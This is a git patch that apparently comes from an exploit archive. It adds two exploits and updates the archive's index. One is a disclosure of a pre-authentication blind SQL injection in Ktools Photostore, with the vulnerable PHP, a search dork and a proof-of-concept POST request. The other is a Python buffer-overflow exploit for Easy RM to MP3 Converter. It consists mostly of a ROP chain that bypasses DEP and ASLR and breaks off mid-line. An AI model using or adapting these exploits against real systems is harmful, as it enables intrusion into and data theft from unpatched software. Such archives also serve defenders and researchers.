From 0fddce018e05a4155635b867b9e0d6123e71fe0b Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 1 Jul 2016 05:05:35 +0000 Subject: [PATCH] DB: 2016-07-01 2 new exploits phpBookingCalendar <= 1.0c - (details_view.php) Remote SQL Injection TFT Gallery <= 0.10 - Password Disclosure Remote Exploit phpBookingCalendar 1.0c - (details_view.php) SQL Injection TFT Gallery 0.10 - Password Disclosure Remote Exploit Seattle Lab Mail 5.5 - POP3 Buffer Overflow Seattle Lab Mail (SLMail) 5.5 - POP3 Buffer Overflow Ktools Photostore 4.7.5 - Blind SQL Injection Easy RM to MP3 Converter 2.7.3.700 - (.m3u) Exploit with Universal DEP+ASLR Bypass --- files.csv | 8 +- platforms/php/webapps/40046.txt | 45 ++++++++ platforms/windows/local/39933.py | 192 +++++++++++++++++++++++++++++++ 3 files changed, 242 insertions(+), 3 deletions(-) create mode 100755 platforms/php/webapps/40046.txt create mode 100755 platforms/windows/local/39933.py diff --git a/files.csv b/files.csv index b62935331..ffaedf713 100755 --- a/files.csv +++ b/files.csv @@ -1349,8 +1349,8 @@ id,file,description,date,author,platform,type,port 1607,platforms/windows/remote/1607.cpp,"Microsoft Internet Explorer (createTextRang) Download Shellcoded Exploit",2006-03-23,ATmaCA,windows,remote,0 1608,platforms/php/webapps/1608.php,"WebAlbum <= 2.02pl - COOKIE[skin2] Remote Code Execution Exploit",2006-03-25,rgod,php,webapps,0 1609,platforms/php/webapps/1609.pl,"PHP Ticket <= 0.71 (search.php) Remote SQL Injection Exploit",2006-03-25,undefined1_,php,webapps,0 -1610,platforms/php/webapps/1610.txt,"phpBookingCalendar <= 1.0c - (details_view.php) Remote SQL Injection",2006-03-25,undefined1_,php,webapps,0 -1611,platforms/php/webapps/1611.pl,"TFT Gallery <= 0.10 - Password Disclosure Remote Exploit",2006-03-25,undefined1_,php,webapps,0 +1610,platforms/php/webapps/1610.txt,"phpBookingCalendar 1.0c - (details_view.php) SQL Injection",2006-03-25,undefined1_,php,webapps,0 +1611,platforms/php/webapps/1611.pl,"TFT Gallery 0.10 - Password Disclosure Remote Exploit",2006-03-25,undefined1_,php,webapps,0 1612,platforms/php/webapps/1612.php,"CuteNews <= 1.4.1 (function.php) Local File Include Exploit",2006-03-26,"Hamid Ebadi",php,webapps,0 1613,platforms/windows/dos/1613.c,"Vavoom <= 1.19.1 - Multiple Vulnerabilities/Denial of Service Exploit",2006-03-26,"Luigi Auriemma",windows,dos,0 1614,platforms/windows/dos/1614.c,"csDoom <= 0.7 - Multiple Vulnerabilities/Denial of Service Exploit",2006-03-26,"Luigi Auriemma",windows,dos,0 @@ -14196,7 +14196,7 @@ id,file,description,date,author,platform,type,port 16396,platforms/windows/remote/16396.rb,"Microsoft SQL Server sp_replwritetovarbin Memory Corruption via SQL Injection",2011-02-08,metasploit,windows,remote,0 16397,platforms/windows/remote/16397.rb,"Lyris ListManager MSDE Weak sa Password",2010-09-20,metasploit,windows,remote,0 16398,platforms/windows/remote/16398.rb,"Microsoft SQL Server Hello Overflow",2010-04-30,metasploit,windows,remote,0 -16399,platforms/windows/remote/16399.rb,"Seattle Lab Mail 5.5 - POP3 Buffer Overflow",2010-04-30,metasploit,windows,remote,0 +16399,platforms/windows/remote/16399.rb,"Seattle Lab Mail (SLMail) 5.5 - POP3 Buffer Overflow",2010-04-30,metasploit,windows,remote,0 16400,platforms/windows/remote/16400.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16401,platforms/windows/remote/16401.rb,"CA BrightStor ARCserve Message Engine Heap Overflow",2010-04-30,metasploit,windows,remote,0 16402,platforms/windows/remote/16402.rb,"CA BrightStor HSM Buffer Overflow",2010-05-09,metasploit,windows,remote,0 @@ -35864,6 +35864,7 @@ id,file,description,date,author,platform,type,port 39652,platforms/multiple/dos/39652.txt,"Adobe Flash - Color.setTransform Use-After-Free",2016-04-01,"Google Security Research",multiple,dos,0 39653,platforms/php/dos/39653.txt,"PHP 5.5.33 - Invalid Memory Write",2016-04-01,vah_13,php,dos,0 39654,platforms/windows/dos/39654.pl,"Xion Audio Player <= 1.5 (build 160) - .mp3 Crash PoC",2016-04-04,"Charley Celice",windows,dos,0 +40046,platforms/php/webapps/40046.txt,"Ktools Photostore 4.7.5 - Blind SQL Injection",2016-06-30,"Gal Goldshtein and Viktor Minin",php,webapps,80 39656,platforms/multiple/local/39656.py,"Hexchat IRC Client 2.11.0 - Directory Traversal",2016-04-04,PizzaHatHacker,multiple,local,0 39657,platforms/multiple/dos/39657.py,"Hexchat IRC Client 2.11.0 - CAP LS Handling Buffer Overflow",2016-04-04,PizzaHatHacker,multiple,dos,0 39659,platforms/hardware/webapps/39659.txt,"PQI Air Pen Express 6W51-0000R2 / 6W51-0000R2XXX - Multiple Vulnerabilities",2016-04-04,Orwelllabs,hardware,webapps,0 @@ -36121,6 +36122,7 @@ id,file,description,date,author,platform,type,port 39930,platforms/osx/dos/39930.c,"OS X Kernel - Stack Buffer Overflow in GeForce GPU Driver",2016-06-10,"Google Security Research",osx,dos,0 39931,platforms/php/webapps/39931.txt,"FRticket Ticket System - Stored XSS",2016-06-13,"Hamit Abis",php,webapps,80 39932,platforms/php/webapps/39932.html,"Viart Shopping Cart 5.0 - CSRF Shell Upload",2016-06-13,"Ali Ghanbari",php,webapps,80 +39933,platforms/windows/local/39933.py,"Easy RM to MP3 Converter 2.7.3.700 - (.m3u) Exploit with Universal DEP+ASLR Bypass",2016-06-13,"Fitzl Csaba",windows,local,0 39934,platforms/php/webapps/39934.txt,"Dream Gallery 2.0 - Admin Panel Authentication Bypass",2016-06-13,"Ali BawazeEer",php,webapps,80 39935,platforms/php/webapps/39935.txt,"Grid Gallery 1.0 - Admin Panel Authentication Bypass",2016-06-13,"Ali BawazeEer",php,webapps,80 39936,platforms/php/webapps/39936.txt,"Joomla PayPlans (com_payplans) Extension 3.3.6 - SQL Injection",2016-06-13,"Persian Hack Team",php,webapps,80 diff --git a/platforms/php/webapps/40046.txt b/platforms/php/webapps/40046.txt new file mode 100755 index 000000000..f8d693521 --- /dev/null +++ b/platforms/php/webapps/40046.txt @@ -0,0 +1,45 @@ +Title : Ktools Photostore <= 4.7.5 (Pre-Authentication) Blind SQL Injection +CVE-ID : CVE-2016-4337 +Google Dork: inurl:mgr.login.php +Product : Photostore +Affected : Versions prior to 4.7.5 +Impact : Critical +Remote : Yes +Website link: http://www.ktools.net +Reported : 02/06/2016 +Authors : Gal Goldshtein and Viktor Minin +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= +No authentication (login) is required to exploit this vulnerability. +The Photostore application password recovery module is prone to a blind sql injection attack. +An attacker can exploit this vulnerability to retrieve all the data stored in the application's database. + + +Vulnerable code is located in the mgr.login.php file: + +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= +case 'recover_login': { + mysqli_query( $db, '' . 'SELECT username,password,email,admin_id FROM ' . $dbinfo[pre] . 'admins where email = \'' . $_POST['email'] . '\'' ); + $result = ; + mysqli_num_rows( $result ); + $returned_rows = ; + mysqli_fetch_array( $result ); + $db_admin_user = ; +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= + +PoC: +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= +POST /photostore/manager/mgr.login.php?pmode=recover_login HTTP/1.1 +Host: victim.net +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://server/photostore/manager/mgr.login.php?username=demo&password=demo +Cookie: member[umem_id]=58C05864CA6A59DBGHJSKDHGDGS770D5; PHPSESSID=30afayreighgfdgucb0d2b0c6dece3158 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 9 + +email=%27%20[SQL PAYLOAD];# +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= + diff --git a/platforms/windows/local/39933.py b/platforms/windows/local/39933.py new file mode 100755 index 000000000..8453994d2 --- /dev/null +++ b/platforms/windows/local/39933.py @@ -0,0 +1,192 @@ +# Exploit Title: Easy RM to MP3 Converter 2.7.3.700 (.m3u) File BoF Exploit with Universal DEP+ASLR bypass +# Date: 2016-06-12 +# Exploit Author: Csaba Fitzl +# Vendor Homepage: N/A +# Software Link: https://www.exploit-db.com/apps/707414955696c57b71c7f160c720bed5-EasyRMtoMP3Converter.exe +# Version: 2.7.3.700 +# Tested on: Windows 7 x64 +# CVE : CVE-2009-1330 + +import struct + +def create_rop_chain(): + + # rop chain generated with mona.py - www.corelan.be + # added missing parts, and some optimisation by Csaba Fitzl + rop_gadgets = [ + + #mov 1000 to EDX - Csaba + 0x41414141, # Filler (compensate) + 0x41414141, # Filler (compensate) + 0x41414141, # Filler (compensate) + 0x10025a1c, # XOR EDX,EDX # RETN + 0x1002bc3d, # MOV EAX,411 # RETN + 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN + 0x41414141, # Filler (compensate) + 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN + 0x41414141, # Filler (compensate) + 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN + 0x41414141, # Filler (compensate) + 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN + 0x41414141, # Filler (compensate) + 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN + 0x41414141, # Filler (compensate) + 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN + 0x41414141, # Filler (compensate) + 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN + 0x41414141, # Filler (compensate) + 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN + 0x41414141, # Filler (compensate) + 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN + 0x41414141, # Filler (compensate) + 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN + 0x41414141, # Filler (compensate) + 0x1002dc4c, # ADD EAX,100 # POP EBP # RETN + 0x41414141, # Filler (compensate) + 0x1002dc24, # ADD EAX,80 # POP EBP # RETN + 0x41414141, # Filler (compensate) + 0x1002dc41, # ADD EAX,40 # POP EBP # RETN + 0x41414141, # Filler (compensate) + 0x1001d2ac, # ADD EAX,4 # RETN + 0x1001d2ac, # ADD EAX,4 # RETN + 0x1001d2ac, # ADD EAX,4 # RETN + 0x1001d2ac, # ADD EAX,4 # RETN + 0x1001d2ac, # ADD EAX,4 # RETN + 0x1001d2ac, # ADD EAX,4 # RETN + 0x1001d2ac, # ADD EAX,4 # RETN + 0x1001d2ac, # ADD EAX,4 # RETN + 0x1001d2ac, # ADD EAX,4 # RETN + 0x1001d2ac, # ADD EAX,4 # RETN + 0x1001d2ac, # ADD EAX,4 # RETN + 0x10023327, # INC EAX # RETN + 0x10023327, # INC EAX # RETN + 0x10023327, # INC EAX # RETN + # AT this point EAX = 0x1000 + 0x1001a788, # PUSH EAX # POP ESI # POP EBP # MOV EAX,1 # POP EBX # POP ECX # RETN [MSRMfilter03.dll] + 0x41414141, # Filler (compensate) + 0x41414141, # Filler (compensate) + 0x41414141, # Filler (compensate) + 0x1001bf0d, #(RVA : 0x0001bf0d) : # ADC EDX,ESI + 0x41414141, # Filler (compensate) + + + 0x10026d56, # POP EAX # RETN [MSRMfilter03.dll] + 0x10032078, # ptr to &VirtualAlloc() [IAT MSRMfilter03.dll] + 0x1002e0c8, # MOV EAX,DWORD PTR DS:[EAX] # RETN [MSRMfilter03.dll] + + 0x1001a788, # PUSH EAX # POP ESI # POP EBP # MOV EAX,1 # POP EBX # POP ECX # RETN [MSRMfilter03.dll] + 0x41414141, # Filler (compensate) + 0x41414141, # Filler (compensate) + 0x41414141, # Filler (compensate) + 0x10027c5a, # POP EBP # RETN [MSRMfilter03.dll] + 0x1001b058, # & push esp # ret [MSRMfilter03.dll] + 0x1002b93e, # POP EAX # RETN [MSRMfilter03.dll] + 0xfffffffb, # put delta into eax (-> put 0x00000001 into ebx) + 0x1001d2ac, # ADD EAX,4 # RETN + 0x10023327, # INC EAX # RETN + 0x10023327, # INC EAX # RETN + 0x1001bdee, # PUSH EAX # MOV EAX,1 # POP EBX # ADD ESP,8 # RETN [MSRMfilter03.dll] + 0x41414141, # Filler (compensate) + 0x41414141, # Filler (compensate) + + 0x10029f74, # POP ECX # RETN [MSRMfilter03.dll] + 0xffffffff, # + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] + 0x1002bc6a, # POP EDI # RETN [MSRMfilter03.dll] + 0x1001c121, # RETN (ROP NOP) [MSRMfilter03.dll] + 0x10026f2b, # POP EAX # RETN [MSRMfilter03.dll] + 0x10024004, #address to xor, it will point to the DLL's data section which is writeable. Also will work as NOP + 0x1002bc07 # PUSHAD # XOR EAX,11005 # ADD BYTE PTR DS:[EAX],AL + + ] + return ''.join(struct.pack('